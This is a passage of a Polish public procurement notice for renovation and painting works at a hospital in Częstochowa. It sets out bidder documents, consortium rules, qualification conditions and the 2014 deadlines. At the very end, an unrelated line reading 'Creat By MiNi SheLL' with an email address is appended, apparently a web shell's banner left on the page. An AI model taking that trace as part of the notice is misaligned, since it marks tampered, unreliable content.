1)	Dokumenty, o których mowa w § 6 ust. 1 pkt. 1, pkt. 2, 3 oraz ust. 2 pkt. 1, 3  winny być złożone w oryginale. Dokumenty o których mowa w § 6 ust. 2a oraz ust. 2 pkt. 2 winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem  przez Wykonawcę .
2)	W przypadku składania elektronicznych dokumentów powinny być  one opatrzone przez Wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
3)	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.

4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:
1)	w § 6 ust. 2 pkt. 2 - skład dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsca  zamieszkania, potwierdzające, że: 
	a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej  niż 6 miesięcy przed upływem terminu składania ofert), 
2)	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 4, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż: 
	a)	6 miesięcy przed upływem terminu składania ofert - dotyczy dokumentów, o których 
		mowa w ust. 3 pkt. 1) ppkt a).
3)	W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym, Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem                         o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu. 

5.		W przypadku składania oferty wspólnej przez kilku przedsiębiorców                          (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej musi złożyć dokumenty wymienione w § 6 ust. 2) niniejszej specyfikacji (lub w § 6          ust. 4  niniejszej specyfikacji - jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej wraz z dokumentem wymienionym w § 6 ust. 2 pkt. 1           i ust. 3) SIWZ. 
	Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników. 
	Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu Cywilnego. 

6. 	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz                      w przypadku, gdy Wykonawca wskazując spełnianie warunków, o których mowa w § 5 ust. 1 pkt. 2 oraz pkt 3 niniejszej specyfikacji polega na zasobach innych podmiotów, kopie dokumentów potwierdzających spełnianie tych warunków, dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów powinny być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dokumentów go dotyczących) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).   

7.	Inne dokumenty wymagane przez Zamawiającego:
1)	Wypełniony i podpisany druk OFERTY, stanowiący Załącznik Nr 1 do SIWZ (oryginał).
2)	Jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej, wymagane jest przedstawienie pełnomocnictwa. Pełnomocnictwo to należy dołączyć do oferty. W swojej treści winno wskazywać uprawnienie do reprezentacji podmiotu/wykonawcy w postępowaniu o udzielenie zamówienia publicznego, a także musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że
w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy to w tym okresie wykonał o najmniej dwie roboty
budowlane o wartości minimum 40.000,00 zł brutto każda.
W przypadku robót budowlanych, których wartość została wyrażona w umowie w innej
walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego
kursu NBP na dzień zakończenia robót budowlanych (w przypadku robót budowlanych
rozliczanych wyłącznie w walutach innych niż PLN).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie powyższego warunku.
Ocena spełniania tego warunku zostanie dokonana w oparciu o złożenie oświadczenie
sporządzone wg wzoru stanowiącego Załącznik Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu
zamówienia, tj.:
osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia
budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno
-budowlanej bez ograniczeń.
Uwaga:
Kierownik budowy powinien posiadać uprawnienia budowlane bez ograniczeń zgodnie
z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jednolity:. Dz. U. z 2010 r.
Nr 243, poz. 1623 z późn. zm.) oraz rozporządzeniem Ministra Transportu
i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji
technicznych w budownictwie (tekst jednolity: Dz. U. Nr 83, poz. 578 z późn. zm.) lub
odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie
wcześniej obowiązujących przepisów.
Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne
w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby,
których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych
w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca
2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach
członkowskich Unii Europejskiej (tekst jednolity: Dz. U. z. U. Nr 63, poz. 394
z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie powyższego warunku.
Ocena spełniania tego warunku zostanie dokonana w oparciu o złożenie oświadczenie
sporządzone wg wzoru stanowiącego Załącznik Nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>ciąg dalszy II.1.6) Wspólny Słownik Zamówień (CPV): 
45.43.22.00-6 -	Wykładanie i tapetowanie ścian.
45.44.21.00-8 -	Roboty malarskie.
45.45.30.00-7 -	Roboty remontowe i renowacyjne.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zgodnie z Załącznikiem Nr 8 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalparkitka.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im Najświętszej Maryi Panny ,42-200 Częstochowa, ul. Bialska 104/118 Dział Zamówień Publicznych ,II p. pok. 310..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2014 godzina 10:00, miejsce: Kancelaria Wojewódzkiego Szpitala Specjalistycznego im Najświętszej Maryi Panny, 42-200 Częstochowa, ul. Bialska 104/118 II p. pok. 356..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com